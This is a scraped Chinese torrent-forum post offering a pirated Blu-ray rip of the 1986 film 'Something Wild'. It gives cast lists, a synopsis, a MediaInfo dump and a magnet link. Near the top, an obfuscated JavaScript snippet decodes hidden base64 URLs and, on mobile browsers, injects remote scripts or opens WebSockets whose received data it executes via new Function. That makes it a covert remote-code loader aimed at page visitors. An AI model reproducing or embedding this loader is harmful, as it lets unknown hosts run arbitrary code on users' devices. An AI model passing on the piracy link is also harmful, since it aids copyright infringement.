散弹露露[简繁字幕].Something.Wild.1986.Criterion.Collection.1080p.BluRay.x265.10bit.FLAC.MNHD 6.96GB

版主小s 1月前 488

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 散弹露露 / 艳遇 / 野性的邂逅(港)
◎片  名 Something Wild
◎年  代 1986
◎产  地 美国
◎类  别 剧情 / 喜剧 / 犯罪
◎语  言 英语
◎上映日期 1986-11-07(美国)
◎IMDb链接 https://www.imdb.com/title/tt0091983/
◎豆瓣评分 7.4/10 (1416人评价)
◎豆瓣链接 https://movie.douban.com/subject/1301827/
◎片  长 113分钟
◎导  演 乔纳森·戴米 Jonathan Demme (id:1032064)
◎编  剧 E·马克斯·弗莱 E. Max Frye (id:1323059)
◎演  员 杰夫·丹尼尔斯 Jeff Daniels (id:1006974)
       梅兰尼·格里菲斯 Melanie Griffith (id:1025204)
       雷·利奥塔 Ray Liotta (id:1036326)
       莱布·兰斯基 Leib Lensky (id:1118793)
       崔西·沃特 Tracey Walter (id:1164847)
       罗伯特·雷吉利 Robert Ridgely (id:1016737)
       爱德华·萨克森 Edward Saxon (id:1296791)
       狗狗马克思 Max the Dog (id:1440695)
       巴兹·基尔曼 Buzz Kilman (id:1114098)
       肯尼思·厄特 Kenneth Utt (id:1010139)
       玛格丽特·柯林 Margaret Colin (id:1018028)
       约翰·塞尔斯 John Sayles (id:1027929)
       查尔斯·纳佩尔 Charles Napier (id:1002794)
       阿德尔·卢茨 Adelle Lutz (id:1041463)
       加里·高兹曼 Gary Goetzman (id:1041545)
       约翰·沃特斯 John Waters (id:1048178)
       安娜·莱文 Anna Levine (id:1049843)
       Patricia Falkenhain Patricia Falkenhain (id:1081214)
       'Sister' Carol East 'Sister' Carol East (id:1085772)
       Drummond Erskine Drummond Erskine (id:1086057)
       Dorothy Demme Dorothy Demme (id:1087548)
       杰克·吉尔平 Jack Gilpin (id:1101385)
       比尔·米勒 Bill Miller (id:1292071)
       罗纳德·M·博兹曼 Ronald M. Bozman (id:1279124)
       乔纳森·戴米 Jonathan Demme (id:1032064)
       肯尼思·厄特 Kenneth Utt (id:1010139)
       爱德华·萨克森 Edward Saxon (id:1296791)
       约翰·凯尔 John Cale (id:1032670)
       劳瑞·安德森 Laurie Anderson (id:1018622)
       塔克·藤本 Tak Fujimoto (id:1009829)
       克雷格·麦凯 Craig McKay (id:1291636)
       比利·霍普金斯 Billy Hopkins (id:1054463)
       里萨·布雷蒙·加西亚 Risa Bramon Garcia (id:1284503)
       Stephen J. Lineweaver Stephen J. Lineweaver (id:1290086)
       Norma Moriceau Norma Moriceau (id:1292511)
       艾兰·丹格里奥 Alan D'Angerio (id:1281682)
       大卫·萨迪 David Sardi (id:1296704)
       罗纳德·M·博兹曼 Ronald M. Bozman (id:1279124)
       Kyle McCarthy Kyle McCarthy (id:1291459)
       Dana J. Kuznetzkoff Dana J. Kuznetzkoff (id:1289146)

◎标  签 美国 / 公路 / 喜剧 / 美国电影 / 爱情 / 1980s / CC / 1986

◎简  介
  杰夫·丹尼尔斯在片中饰演个性保守的雅痞行政人员,偶然到餐厅吃午饭,碰到狂野女郎梅拉尼·格里菲思。她把他带到汽车旅馆展开激情游戏,令他大感意外。然而接下来的一段放荡不羁的刺激遭遇,更是令他惊喜交集,整个改变了他的人生。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 195426581628592693356510934937891087503 (0x9305CA61678B919F33F8C67B9285A48F)

  4. Complete name                            : Something.Wild.19[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.96 GiB

  8. Duration                                 : 1 h 53 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 8 762 kb/s

  11. Encoded date                             : UTC 2021-08-16 08:46:43

  12. Writing application                      : mkvmerge v45.0.0 ('Heaven in Pennies') 64-bit

  13. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2

  14. Cover                                    : Yes

  15. Attachments                              : cover


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@High

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 53 min

  23. Bit rate                                 : 8 184 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 1 080 pixels

  26. Display aspect ratio                     : 16:9

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.165

  33. Stream size                              : 6.50 GiB (93%)

  34. Writing library                          : x265 3.5:[Linux][GCC 9.3.0][64 bit] 10bit

  35. Encoding settings                        : cpuid=533541111039 / frame-threads=5 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=163676 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=23 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.0 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=2 / aq-strength=1.00 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.709

  40. Transfer characteristics                 : BT.709

  41. Matrix coefficients                      : BT.709


  42. Audio

  43. ID                                       : 2

  44. Format                                   : FLAC

  45. Format/Info                              : Free Lossless Audio Codec

  46. Codec ID                                 : A_FLAC

  47. Duration                                 : 1 h 53 min

  48. Bit rate mode                            : Variable

  49. Bit rate                                 : 527 kb/s

  50. Channel(s)                               : 2 channels

  51. Channel layout                           : L R

  52. Sampling rate                            : 48.0 kHz

  53. Frame rate                               : 10.417 FPS (4608 SPF)

  54. Bit depth                                : 16 bits

  55. Compression mode                         : Lossless

  56. Stream size                              : 429 MiB (6%)

  57. Writing library                          : Lavf58.29.100

  58. Language                                 : English

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Text #1

  62. ID                                       : 3

  63. Format                                   : PGS

  64. Muxing mode                              : zlib

  65. Codec ID                                 : S_HDMV/PGS

  66. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration                                 : 1 h 51 min

  68. Bit rate                                 : 56.3 kb/s

  69. Count of elements                        : 3758

  70. Stream size                              : 44.7 MiB (1%)

  71. Language                                 : English

  72. Default                                  : No

  73. Forced                                   : No


  74. Text #2

  75. ID                                       : 4

  76. Format                                   : PGS

  77. Muxing mode                              : zlib

  78. Codec ID                                 : S_HDMV/PGS

  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration                                 : 1 h 48 min

  81. Bit rate                                 : 22.5 kb/s

  82. Count of elements                        : 1792

  83. Stream size                              : 17.5 MiB (0%)

  84. Title                                    : Simplified Chinese

  85. Language                                 : Chinese

  86. Default                                  : Yes

  87. Forced                                   : No


  88. Text #3

  89. ID                                       : 5

  90. Format                                   : PGS

  91. Muxing mode                              : zlib

  92. Codec ID                                 : S_HDMV/PGS

  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration                                 : 1 h 48 min

  95. Bit rate                                 : 22.9 kb/s

  96. Count of elements                        : 1792

  97. Stream size                              : 17.9 MiB (0%)

  98. Title                                    : Traditional Chinese

  99. Language                                 : Chinese

  100. Default                                  : No

  101. Forced                                   : No


  102. Menu

  103. 00:00:00.000                             : en:Opening credits

  104. 00:03:13.610                             : en:A closet rebel

  105. 00:08:01.230                             : en:VP

  106. 00:09:31.654                             : en:Four pints

  107. 00:12:30.541                             : en:A really good liar

  108. 00:19:10.691                             : en:Change of plans

  109. 00:20:42.282                             : en:Mom & Dad's

  110. 00:24:07.070                             : en:Live dog or dead lion

  111. 00:27:41.409                             : en:New wheels

  112. 00:30:54.060                             : en:Thrift store makeover

  113. 00:32:50.343                             : en:"Don't call me Lulu"

  114. 00:35:40.179                             : en:Past to present

  115. 00:38:35.396                             : en:Reunions

  116. 00:45:03.534                             : en:Unconvinced

  117. 00:48:39.708                             : en:Cutting loose

  118. 00:50:43.582                             : en:Enter Ray

  119. 00:53:01.219                             : en:"Always keep 'em guessing"

  120. 00:55:09.431                             : en:Getting some answers

  121. 01:01:04.744                             : en:Marlboros

  122. 01:04:28.948                             : en:True confessions

  123. 01:11:29.868                             : en:"Attempt to be cool"

  124. 01:15:55.175                             : en:Asleep at the wheel

  125. 01:21:03.525                             : en:Turning the tables

  126. 01:27:13.686                             : en:Back on the road

  127. 01:33:33.983                             : en:"The other half of you"

  128. 01:42:11.583                             : en:No good-byes

  129. 01:48:04.060                             : en:End credits

  130. 01:53:46.402                             : en:Color bars



TAGS 剧情 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:C981D798B6D81136A098C783DE5D6DD44F489BEA
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回